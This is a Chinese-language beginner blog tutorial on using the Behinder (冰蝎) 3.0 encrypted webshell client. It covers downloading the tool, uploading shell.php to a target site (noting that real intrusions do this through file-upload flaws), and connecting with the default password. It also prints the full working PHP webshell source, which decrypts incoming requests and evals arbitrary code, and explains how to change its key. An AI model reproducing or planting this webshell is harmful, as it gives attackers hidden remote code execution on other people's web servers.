网站控制工具:冰蝎3.0使用体验
这篇文章比较基础,主要面向新手,技术含量较低主要为操作流程。
0x01. 冰蝎是什么
利用动态二进制加密实现新型一句话木马的客户端 , 相对于菜刀和蚁剑他的数据是加密传输的
1.1 下载
github地址:
下载后的文件
server文件中放的是各种语言的webshell,如下图:
Behinder_v3.0_Beta6_win.jar是客户端 , 双击就能打开 , 但是要有java环境 , 下图是我的java环境
data.db是数据库相关文件 , 最下面更新日志文件
surprise! 500G网络安全学习资料,👉戳此
0x02. 连接webshell
2.1 环境准备
这里我就简单演示 , 直接在本机电脑上启动phpstudy
http://192.168.1.106/
手动将php的shell上传到网站上 , 实际渗透过程中是通过文件上传 , 将shell.php上传到对方网站中
http://192.168.1.106/muma/shell.php
2.2 打开客户端连接
双击Behinder_v3.0_Beta6_win.jar , 打开之后就是以下画面
右键 —> 新增 , 依次输入shell的信息 , 默认密码 : rebeyond
进行连接
连接成功
0x03. 默认密码修改
打开shell.php , 在源码中可以看到
<?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION[k]=$key; $post=file_get_contents("php://input"); if(!extension_loaded(openssl)) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode(|,$post); $func=$arr[0]; $params=$arr[1]; class C{ public function __invoke($p) { eval($p."");}} @call_user_func(new C(),$params); ?>
该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
如果你想修改连接密码只需要替换掉先前md5的前16位 , 比如更改连接密码为admin
$key="21232f297a57a5a7"; //该密钥为连接密码32位md5值的前16位,连接密码admin
然后替换源文件中的这一句代码 , 保存并退出 , 这样以后的shell.php的链接密码为admin
冰蝎客户端的详情介绍 :
上一篇:
Java架构师技术进阶路线图
下一篇:
Linux防火墙常用命令总结